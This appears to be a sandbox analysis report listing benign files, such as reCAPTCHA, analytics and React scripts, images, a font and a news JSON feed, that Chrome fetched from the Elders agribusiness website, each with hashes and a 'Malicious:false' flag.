                                                                                                                                                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1468
                                                                                                                                                                                                            Entropy (8bit):5.804481977980605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:2jkm94/zKPccAaflSi+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6Qp:VKEcgBKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                            MD5:D5136C3BA35BD4951DD2E05D1C0D6410
                                                                                                                                                                                                            SHA1:5C0A14736FA0A45B3633DFBE1C8EFF923A9D8FF3
                                                                                                                                                                                                            SHA-256:C054EDA69ECD98E551B37886DF259580DF42AB54C0E39C3EAA04F76AB8917E12
                                                                                                                                                                                                            SHA-512:6D542EDD4AB29E6A2D145296C762D52C00095E90AAFC4EA72B33B984D0C96F1914BFE33694683F9B64762A6484DF701D6F303E8CF681668C3E0B7BFFFAE00C97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):67020
                                                                                                                                                                                                            Entropy (8bit):5.351351018429131
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:+zDEeJ7Yolr3DoUzaOGoKrsKPIdRMdOYkyJ+nMFvm87o6d0h2hNVRjy4MSbtzfWP:gD/9Yolr3D4M5yJ+nQveP4MSBaz
                                                                                                                                                                                                            MD5:49CDC2AA4517A0912673006E2106BA07
                                                                                                                                                                                                            SHA1:13D2AB6037F731E2D644D8D590D1D73DC82F68C7
                                                                                                                                                                                                            SHA-256:6CBFDDB4735BDCA8B4D594C0222541A0AA1F53EE6B4359647960ED164F595863
                                                                                                                                                                                                            SHA-512:98F19F2F291CD1C6D5441DB248D762CB864C7BF3F0123AFC24392CBBCEB9EE1B7803DC7577231B82623BC1A4865E98B569E5217C2F7EE276BC5E4ADB8CFD9FEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callback(){return si},get callbacks(){return ti},get clear(){return ci},get consent(){return ui},get data(){return $r},
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):93735
                                                                                                                                                                                                            Entropy (8bit):7.967524744656122
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:KDkIid4vDhgEL/O76nPSS829o8oGceeVF0CLPU22nQP7hcBgX5biHIn6gPKWZ7dH:MzFvGK/OmKSx9oXGcH0YPUK76BGCfgPb
                                                                                                                                                                                                            MD5:2A95B76DABD49B515845089D6A4880C1
                                                                                                                                                                                                            SHA1:3D31B946904E7DAAC173FAE6CD98A006AB277016
                                                                                                                                                                                                            SHA-256:A3FBCE3A38AC3CE955D5C79F085C9CA4F4691F2750F62A22A03AD9E3B7538B62
                                                                                                                                                                                                            SHA-512:52CEAF58864239C90439610D8C3B75F1BAAE5F9F8220C41A781037084E058C85B7E2AC552D117107397EE7FD23199D6B3D4C3EDA9F26CFB50D7C38E1EF55A654
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32755)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36178
                                                                                                                                                                                                            Entropy (8bit):5.31962188524243
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:wYRKHdumNd/M2r+VVXJrk6Hx372qDgDsVKg7CUgBFmY7K:wfdu+d/76vXKSySGbK
                                                                                                                                                                                                            MD5:D8232F86C8016A8E0ACAA7ECFDF72B3E
                                                                                                                                                                                                            SHA1:C21FB1EF9E07FBF03A08C152DC0C1B755D42C475
                                                                                                                                                                                                            SHA-256:B3BCE010C0F5A7C24A82AE511194BAF67BF8C2CEE737A3A118F6B9590D322B15
                                                                                                                                                                                                            SHA-512:84685AF6B7939E75D0CDF62D370B364C1A4FF67485B8A03646E60D669B4B5A6B86E10BDB97FF466B7C8310E1F09597F517F65126B1B9979C8E3B9E5DE910BD43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js`..function AppMeasurement(e){var t=this;t.version="2.27.0";var n,a,i=window;i.s_c_in||(i.s_c_il=[],i.s_c_in=0),t._il=i.s_c_il,t._in=i.s_c_in,t._il[t._in]=t,i.s_c_in++,t._c="s_c";try{n=i.AppMeasurement,(a=n.Cc)||(a=null)}catch(e){}var r,o,c,s=i;try{for(r=s.parent,o=s.location;r&&r.location&&o&&""+r.location!=""+o&&s.location&&""+r.location!=""+s.location&&r.location.host===o.host;)r=(s=r).parent}catch(e){}t.log=function(e){try{console.log(e)}catch(e){}},t.bb=function(e){return""+parseInt(e)==""+e},t.replace=function(e,t,n){return!e||0>e.indexOf(t)?e:e.split(t).join(n)},t.escape=function(e){var n,a;if(!e)return e;for(e=encodeURIComponent(e),n=0;7>n;n++)a="+~!*()'".substring(n,n+1),0<=e.indexOf(a)&&(e=t.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},t.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?t.replace(e,"+"," "):e;try{return de
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):705
                                                                                                                                                                                                            Entropy (8bit):7.543354064069374
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/74/6Ts/ljgs1Xq8Fwa+SJ/1Kl69d1VG5oKanYqMwC4+pKfzeVBNAQcE:x/6Og+qwJgl69dK5bCYcCVOE
                                                                                                                                                                                                            MD5:CADBD6B75F35FF2B2E5CCF257A9975C6
                                                                                                                                                                                                            SHA1:BDB1EB15DEB30A22E4C1E2B76C61F28B64EAEB43
                                                                                                                                                                                                            SHA-256:A4B5CE886DED1D9DBF02BD1D499988306F756B0BA1CAA0CB2AF772AFDA38986C
                                                                                                                                                                                                            SHA-512:5A56C890F4AD372FE01C64F26E78DC645F6BF7AC68DFA9F95BA199A16DDE87A06D17DE46C051EA7D860964FC11C19C4149C5F824B20D9B5A3C4E9FA08E62EC35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/facebook.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....VIDATx..VMn.P..yv.........#...;v..BN@9A..Jo.n....d.....f..)H%. y.<.4.......73o.{c#,.a........F@Cm%.... ..0..A....m6..C.......H.....H..ov.........".....M...>.:0M...x....?*..y}w...W.3.T....z}7...?..[.smk.....0.b.77.m...t.lZ|.NJG$...&.Z....2. g:..d..1...5.y.b..WX....s7](.W..GI.=.l/....vtD.........p.)3nE..V..!....#..f.(5..l[..V+f.SF....P"...o./U 8..w......T&N.f....@...H....a......w..=.t..E..L.,.Y..W'..s..S`..=mZq.._....y..z...Z..E".S._pO..5.K&SM..9....27....}..49.y.T[Q4..L..AR...;.C7"....$..6E.n..sN..kB..}.u...B_..pB.N.g..N.L.g.8P.JW ...w.(.m..&<.Z......V.M.#.u.kH...9P.?....jX.....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5538
                                                                                                                                                                                                            Entropy (8bit):4.855074843571827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9J4o/vHtcZfoRUGSA8a32BtT3lh2toLZU6KJyaz8G0Y:T1vHsfoRfSA8y2B93lh2toLZV+yaz2Y
                                                                                                                                                                                                            MD5:6ECA9F97D2E4B34F7B8C85B49887C474
                                                                                                                                                                                                            SHA1:3155098A09A2D8BAE294A044C3D82452BDDC6CBC
                                                                                                                                                                                                            SHA-256:A5C392E142DD1D80325021AD4497F87E97372DA8819D04C63EB09132D8C0EE25
                                                                                                                                                                                                            SHA-512:A86FFEFF1FF65DF109EA2CA6098B533D8D6F4BCD98A7604E247E93EDE7161B903D9B52C05F460F061E99D4573CCEC36AF94618A2BC0BAA4F7B7F2D4227FF0F55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */..// /* eslint-disable max-classes-per-file */.(function () {. 'use strict';.. /* eslint-env browser */. function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance =
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1352)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1080227
                                                                                                                                                                                                            Entropy (8bit):4.683413687755208
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:Eb4LcitesQOUrfhl597ZRt4f/t7EQWRWqPwiQ3YaA4gSX:Eb4LcitesQOUrfhH97ZR2FEQWRWqPwi0
                                                                                                                                                                                                            MD5:3EDF0EB850CBD3326D48DD88B6C3029F
                                                                                                                                                                                                            SHA1:AB3BD02C5322C693EBE6E824BA87141E57A3A18A
                                                                                                                                                                                                            SHA-256:F9044A5E9C39DB8BB1A204DFF924E526EC0A621E695BB69DE1035811BE8709E4
                                                                                                                                                                                                            SHA-512:51D09A415EF8CA0E2DFCFCB6EBBE0B8A4253A0103474C0623DC89CB23BD626815C832EE63589453DFD585FA876B06E17BE16AA785A30FDB32C329ED9E2152048
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/**. * @license React. * react-dom.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('react')) :. typeof define === 'function' && define.amd ? define(['exports', 'react'], factory) :. (global = global || self, factory(global.ReactDOM = {}, global.React));.}(this, (function (exports, React) { 'use strict';.. var ReactSharedInternals = React.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED;.. var suppressWarning = false;. function setSuppressWarning(newSuppressWarning) {. {. suppressWarning = newSuppressWarning;. }. } // In DEV, calls to console.warn and console.error get replaced. // by calls to these methods by a Babel plugin.. //. // In PROD (or in packages without access to React internals),.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (553)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3681
                                                                                                                                                                                                            Entropy (8bit):5.310615162639586
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:IGUXERTgdf3nfLzeJpMJvAdFADGKCnt0gzCH9Uum33Es3PBH0Or/1mSh/F4ksiiN:BDzFHXz4M3r9LjqziiN
                                                                                                                                                                                                            MD5:011C0FC0D0CF131BDFF879743A353002
                                                                                                                                                                                                            SHA1:9336BA4F6BD99531147F284CF217D473EB6FA3C0
                                                                                                                                                                                                            SHA-256:2DBB30AF18C1CC025D432F934A8B23478A3539D525BFA6100FB097E2DCDAFE57
                                                                                                                                                                                                            SHA-512:0681C12F9DA2507D19D32CE68C2B4A6ACA9F56A8F9BCC5CF3840B1757FD15DE1EF1411069913D566D39933DA586401585DA7481F0762795CF0E4DD64A2410E00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.externalize&&(c.url=k.externalize(c.url)),c.encodePath&&(c.url=k.encodePathOfURI(c.url)));c.hook&&(h=k.getXhrHook(c.url,c.type,c.data))&&(c.url=h.url,h.params&&("GET"===c.type.toUpperCase()?c.url+="?"+g.param(h.params):c.data=g.param(h.params)))},statusCode:{403:function(h){"Authentication Failed"===.h.getResponseHeader("X-Reason")&&k.handleLoginRedirect()}}});g.ajaxSettings.traditional=!0})(jQuery,this);.(function(g){window.Granite.csrf||(window.Granite.csrf=g(window.Granite.HTTP))})(function(g){function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.con
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93735
                                                                                                                                                                                                            Entropy (8bit):7.967524744656122
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:KDkIid4vDhgEL/O76nPSS829o8oGceeVF0CLPU22nQP7hcBgX5biHIn6gPKWZ7dH:MzFvGK/OmKSx9oXGcH0YPUK76BGCfgPb
                                                                                                                                                                                                            MD5:2A95B76DABD49B515845089D6A4880C1
                                                                                                                                                                                                            SHA1:3D31B946904E7DAAC173FAE6CD98A006AB277016
                                                                                                                                                                                                            SHA-256:A3FBCE3A38AC3CE955D5C79F085C9CA4F4691F2750F62A22A03AD9E3B7538B62
                                                                                                                                                                                                            SHA-512:52CEAF58864239C90439610D8C3B75F1BAAE5F9F8220C41A781037084E058C85B7E2AC552D117107397EE7FD23199D6B3D4C3EDA9F26CFB50D7C38E1EF55A654
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:TrueType Font data, 15 tables, 1st "FFTM", 44 names, Macintosh
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):227504
                                                                                                                                                                                                            Entropy (8bit):5.504571788876336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Zd4qrHE8TJS+JdQ0J9uSqC5ahr0BDxFTRK:RrHE8TJScdluiahr0blRK
                                                                                                                                                                                                            MD5:F551DE70C45E8C68EC16E39B1F1E815C
                                                                                                                                                                                                            SHA1:9FB8BC8ADE21175339CA59952BC29119B67F690C
                                                                                                                                                                                                            SHA-256:B1CDC3004982532C72FE0C87DB552DA5B8D4A254ABAAB45F54473FE7B82B39D0
                                                                                                                                                                                                            SHA-512:E75C30176A7E7FFEB20B911C852C37108D1874DF919DE0F1205BCB623E3488381E70C0B40EAAE6ACE5E3F8BD648C5B70B104FD99816FBA431ADE2CA26700E18D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf
                                                                                                                                                                                                            Preview:...........pFFTM..J...x.....GDEF*.....6....fGPOS..@...X.....GSUB..."..7\..!.OS/2..p*...x...`cmap...3........gasp......6.....glyf......#4...lhead.aP........6hhea.6.....4...$hmtx.e..........loca._.........jmaxp.......X... name.6nR..... .post.I0k......,H............_.<...................d].....Q.N...........................o.Q...........................................@...................i.......i.....;..................P. {........MONO..............." .............. ...,.L.....M...........$.U..._.6.#.C.7.Z.-...A..._.E._.E.....-...7.".A.-.7...K...A.B.A...7.(.A...-.!.-...<.?.A...#.B.A.=.7.0.U.@.U.G...x.7.H.-...-...A.G...a._.=.A.y._..._..._...B..._..._.....,._..._.&.F..._...A.$._...A.,._.C.7.....{.Z.A...6...".........-..._.........|.A.....h.7...<.<.P...A.;.A...A././...2.7.R...L.......R...S.,.M.,.L.%.<.9.T.9.A.D.N...7.@...-.Z...................-.K.-..._.K...N.A.....$.U...A.3.7...:......._.$.A...7.j.A...7...A...7.-.7.j.A.D.....-...7.f.-.k.-.h.7...Z.Y.#.-.U.".7.E.-...7...7...-...-...-...7.G..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 24.7 (Macintosh), datetime=2023:09:12 16:44:35], baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):217911
                                                                                                                                                                                                            Entropy (8bit):7.950284091369804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:GSQ29uiOQLDcFAqKIYZXl4+Pd0xKVJ5r7DMPOtsp+r:3Q2+LFzYXKEVbr74Pfp+r
                                                                                                                                                                                                            MD5:366F97D01F3E828A9F45CC84CE4F5E46
                                                                                                                                                                                                            SHA1:9661389B60114186623F981770706CBCBD764505
                                                                                                                                                                                                            SHA-256:AC7429BEF4448859F5AF61E178240E6155AD904E65C58EAD8F14953A0EEC687B
                                                                                                                                                                                                            SHA-512:EF1FBFDB1A4C0CDF79D5156BB27B57B6C709A4F66CC51BF59F697ED1B21EF37BC50886F5A5B6469B7BAB687C9A90A4D231C37BD5CA22CEE724345C8ED67F8953
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/images/homepage-banners/two_staff_members_with_client_by_ute.jpg
                                                                                                                                                                                                            Preview:.....nExif..MM.*.............................b...........j.(...........1.....!...r.2...........i....................'.......'.Adobe Photoshop 24.7 (Macintosh).2023:09:12 16:44:35...........................X..........................................."...........*.(.....................2...........4.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................k...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I.#".j.}..:..lk...EU5....V...(..ci....4..S..o...*.cc..{/.J..7s...>........}X...#..6\.eT......3....:.=....\wJ.g...#'2.)
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3772
                                                                                                                                                                                                            Entropy (8bit):3.834088123858926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:x0h5r8869TkYp9e9oCvMA5lu/uNiPF/r7I1Ga0pFby:x0npGJkZ5A/uIxrsF0pFby
                                                                                                                                                                                                            MD5:68D8392693D2E3F169888BD1BE9621D9
                                                                                                                                                                                                            SHA1:90952E7C090EF318567B562D22A5FB8B26388321
                                                                                                                                                                                                            SHA-256:5285194B6175B6C2FD8A83876A24FBB20611FF80899323CBDF4A9DD4DE1F60CA
                                                                                                                                                                                                            SHA-512:2EC9AF1D78034D45CBC15303CC830E34690141EFADF9D30D5D0C1F7786032EA074CACAC14B023317E9508EE8DBC0C3F7F205E8CE8AE6E64E29F3856D174C6A4B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svg
                                                                                                                                                                                                            Preview:<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.737 8.99691C65.9247 9.10241 65.049 9.44001 64.2367 10.0413C63.7197 9.45056 63.5298 9.27121 63.0023 9.09186C61.9052 8.73316 60.6814 9.37671 59.964 10.1996L55.6702 14.6622C55.5014 14.831 55.3432 14.9892 55.1744 15.1475L55.1427 15.1686C53.2754 16.9409 51.5874 18.1542 49.1504 18.4601C46.0065 18.861 44.8672 16.5506 48.5807 13.2063C50.4269 11.55 51.7246 11.4023 52.2837 11.7082C53.1488 12.1724 52.9167 13.4806 48.9077 15.2846C48.4858 15.4745 47.9161 15.7277 48.1271 16.7405C48.2009 17.0992 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 42.0714 1
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):71908
                                                                                                                                                                                                            Entropy (8bit):4.949691288303569
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:wERvX27zEwHaeYQNEZWffCmAzmf3jzJlZk/iDOHXjGSFEpkWAZ27QujEeLh1LjEm:nvX2EYawEly8OSFETAGg+V/
                                                                                                                                                                                                            MD5:AE7C1173324FAAC96B86047470C33398
                                                                                                                                                                                                            SHA1:06AEBE0C8CC9ED0FFB1709A4AE73C113D75F6BC9
                                                                                                                                                                                                            SHA-256:49190B71F43E6DDF1A9A37AE8832AB9ED067D8641B1E0B350534525A91651CC2
                                                                                                                                                                                                            SHA-512:63FE811B60A5EE3F0C9411FC95407A18022AF432E468FE9CC42CA2672E2245FFAC622F9EFD206B38754EB3EF14B355E52C877563CF777D380414B29C9FE08C99
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/bin/el/localised-news?branchId=
                                                                                                                                                                                                            Preview:[{"title":"New lentil varieties take centre stage at Lock trial site","publishedDate":"23 Sep 2024","pagePath":"/our-services/news-advice/2024/new-lentil-varieties-take-centre-stage-at-lock-trial-site/","thumbnail":"/content/dam/eld/images/community---events/events/lock_trial_site_set_up_shot.jpg","tagId":"el:branch/locations/sa/fleurieu-peninsula","hierarchy":3},{"title":"Online clearing sale sells goods from SA.s far west to the deep south","publishedDate":"28 Mar 2024","pagePath":"/our-services/news-advice/2024/online-clearing-sale-sells-goods-across-sa/","thumbnail":"/content/dam/eld/images/staff-in-action/staff-outdoors/elders_staff_infront_of_shed_and_machinery.jpg","tagId":"el:branch/locations/sa/fleurieu-peninsula","hierarchy":3},{"title":"Elders speaks on net zero transition for agriculture at Regions Rising summit in South Australia","publishedDate":"27 Mar 2024","pagePath":"/our-services/news-advice/2024/elders-speaks-on-net-zero-transition-for-agriculture/","thumbnail":"/
